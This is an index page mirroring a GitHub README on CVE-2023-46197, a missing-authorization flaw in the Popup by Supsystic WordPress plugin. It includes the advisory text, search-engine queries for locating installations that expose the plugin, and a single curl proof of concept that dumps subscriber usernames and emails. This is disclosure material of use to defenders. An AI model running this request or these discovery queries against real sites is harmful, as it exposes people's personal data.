Ecosyste.ms: Awesome
An open API service indexing awesome lists of open source software.
https://github.com/randomrobbiebf/cve-2023-46197
Popup by Supsystic <= 1.10.19 - Missing Authorization to Sensitive Information Exposure
https://github.com/randomrobbiebf/cve-2023-46197
Last synced: about 1 month ago
JSON representation
Popup by Supsystic <= 1.10.19 - Missing Authorization to Sensitive Information Exposure
- Host: GitHub
- URL: https://github.com/randomrobbiebf/cve-2023-46197
- Owner: RandomRobbieBF
- License: apache-2.0
- Created: 2023-10-23T12:38:37.000Z (about 1 year ago)
- Default Branch: main
- Last Pushed: 2023-10-23T12:44:19.000Z (about 1 year ago)
- Last Synced: 2023-10-23T13:37:01.628Z (about 1 year ago)
- Size: 0 Bytes
- Stars: 0
- Watchers: 1
- Forks: 0
- Open Issues: 0
-
Metadata Files:
- Readme: README.md
- License: LICENSE
Awesome Lists containing this project
README
# CVE-2023-46197
### Popup by Supsystic <= 1.10.19 - Missing Authorization to Sensitive Information Exposure### Description
"The Popup by Supsystic plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 1.10.19 via the getWpCsvList action. This makes it possible for authenticated attackers with subscriber level access or higher to extract sensitive data including subscriber email addresses."```
reference:
- https://www.wordfence.com/threat-intel/vulnerabilities/id/f458663f-6b1a-4acd-b2db-c66d7a915ab7?source=api-prod
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N
cvss-score: 4.3
cve-id: CVE-2023-46197
metadata:
fofa-query: "wp-content/plugins/popup-by-supsystic/"
google-query: inurl:"/wp-content/plugins/popup-by-supsystic/"
shodan-query: 'vuln:CVE-2023-46197'
slug: 'popup-by-supsystic'
```Proof of concept:
---```
curl "http://wordpress.lan/?mod=subscribe&action=getWpCsvList&pl=pps""Username";"Email";"Activated";"PopUp ID";"Date Created"
```